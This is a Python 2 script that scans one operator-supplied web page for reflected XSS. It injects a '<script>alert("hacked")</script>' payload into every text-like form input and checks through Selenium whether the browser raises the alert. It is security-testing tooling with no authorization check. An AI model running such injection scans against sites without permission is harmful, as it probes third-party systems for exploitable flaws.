import datetime
import urllib
from BeautifulSoup import *
from selenium import webdriver
# VARIABLES
# Timestamp tag for log lines. NOTE: evaluated once at import time, so every
# message carries the time the module was loaded, not the time it was printed.
tm = "[%s]" % datetime.datetime.now().strftime('%H:%M:%S')
# Severity tags prefixed to log lines.
wrn, inf = "[WARNING]", "[INFO]"
# <!==================================================!>
# XSS INJECTION!!!
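def xss():
    """Probe every form of one operator-supplied page for reflected XSS.

    Flow, as implemented below:
      1. Prompt for a URL until it starts with http:// or https://.
      2. Fetch the page and collect its <form> elements.
      3. For each form, put a fixed alert() marker into every named,
         text-like <input>, append the parameters to the form target as a
         query string and load that URL in Firefox through Selenium.
      4. Report the form as reflecting input when the browser raises an
         alert whose text equals the marker.

    Limitations to keep in mind when reading the output: parameters are
    always sent in the query string, even when the form declares POST; only
    the last path segment of ``action`` is used, resolved against the entered
    URL; a negative result only means this one marker did not execute.

    Takes no arguments and returns None; all results are printed.
    """

    def _say(level, *parts):
        # One log line: module timestamp tag, level tag, then the message parts.
        print(" ".join((tm, level) + parts))

    while True:
        url = raw_input('Enter URL: ').strip()
        print("..........")
        # Anchor the scheme check at the start of the string. A substring
        # test would accept input that merely contains "http://", and
        # Python 2's urllib.urlopen() opens scheme-less strings as local files.
        if url.startswith(("http://", "https://")):
            break
        print("Wrong input given!\n")

    _say(inf, "Connecting to the URL...")
    try:
        response = urllib.urlopen(url)
        try:
            html = response.read()
        finally:
            response.close()
        soup = BeautifulSoup(html)
    except Exception:
        _say(wrn, "Target URL is not stable!!!")
        _say(wrn, "Make sure you are connected to the internet.\n")
        # Nothing was parsed, so there are no forms to look at.
        return
    _say(inf, "Target URL is stable...")
    print("..........\n..........")

    # Input types that accept free text and are therefore worth filling in.
    text_like = ("text", "password", "email", "number", "search", "tel", "url")
    marker = "hacked"  # alert text that proves the payload executed
    payload = '<script>alert("hacked");</script>'
    f_num = 0  # Counts the forms seen so far.
    completed = False

    try:
        for frm in soup('form'):
            f_num += 1
            f_name = frm.get('name', "-")
            f_method = frm.get('method', "GET").upper()
            f_action = frm.get('action', url)
            _say(inf, "Searching for vulnerable Forms...")
            print("==================================================")
            print("Form %d" % f_num)
            print("==================================================")
            _say(inf, "Checking Form...")
            _say(inf, "Form name: '" + f_name + "'...")
            _say(inf, "Request method used:", "'" + f_method + "'...")

            # Parameters for this form only; a fresh dict per form keeps one
            # form's fields from leaking into the next request.
            values = {}
            for tag in frm('input'):
                # An <input> without a type attribute is a text field in HTML.
                in_type = tag.get('type', "text").lower()
                in_name = tag.get('name')
                if in_type not in text_like or not in_name:
                    continue
                values[in_name] = payload
                _say(inf, "Input type:", "'" + in_type + "'...")

            # ACTION FIX: keep only the last path segment of the action.
            trimmed = f_action[:-1] if f_action.endswith("/") else f_action
            act = trimmed.rsplit("/", 1)[-1]
            _say(inf, "Action:", "'" + act + "'...")

            # URL FIX: work on a per-form copy so every form is resolved
            # against the URL the operator typed, not a previous form's target.
            form_url = url
            if form_url.count("/") < 3:
                form_url += "/"
            # Part of the URL after "//", without one trailing slash.
            host_and_path = form_url[form_url.find('/') + 2:].strip()
            if host_and_path.endswith('/'):
                host_and_path = host_and_path[:-1]
            if host_and_path == act.strip():
                # The action names the page itself: only drop the last slash.
                form_url = form_url[:form_url.rfind('/')]
            else:
                form_url = form_url[:form_url.rfind('/') + 1] + act
            _say(inf, "New URL:", form_url)

            # APPEND PARAMETERS TO THE URL
            _say(inf, "Injecting malicious code into the URL...")
            data = urllib.urlencode(values)
            separator = "&" if "?" in form_url else "?"
            new_page = form_url + separator + data
            _say(inf, "Injected URL:", new_page)

            names = " ".join(values) or "-"
            _say(inf, "Testing for XSS injection on", "'" + f_method + "'",
                 "parameter(s)", "'" + names + "'...")

            # CHECK FOR ALERT
            alert_text = ""
            browser = None
            try:
                browser = webdriver.Firefox()
                browser.get(new_page)
                alert = browser.switch_to_alert()
                alert_text = alert.text
                alert.accept()
            except Exception as err:
                # With a running browser, an exception here is presumably the
                # "no alert was raised" path and is read as a negative result.
                # A browser that never started is reported instead of being
                # counted as a negative.
                if browser is None:
                    _say(wrn, "Could not start Firefox: %s" % err)
            finally:
                # Always end the session, whichever path was taken, so no
                # browser process is left behind per form.
                if browser is not None:
                    try:
                        browser.quit()
                    except Exception:
                        pass
            if browser is None:
                continue

            if alert_text == marker:
                print("\n<!-- XSS injection is possible --!>")
                print(" <!-- XSS type: Reflected --!>")
            else:
                print("\n<!-- XSS injection is not possible --!>")
            completed = True
            print("\n")
    except Exception as err:
        # Report the failure instead of hiding it, then fall through to the
        # summary so the run is visibly marked as incomplete.
        _say(wrn, "Scan aborted: %s" % err)
        completed = False

    if completed:
        print("Finished successfully!!!")
    else:
        _say(wrn, "The program was terminated abnormally!")
    print("\nFinish.")
    print("==================================================")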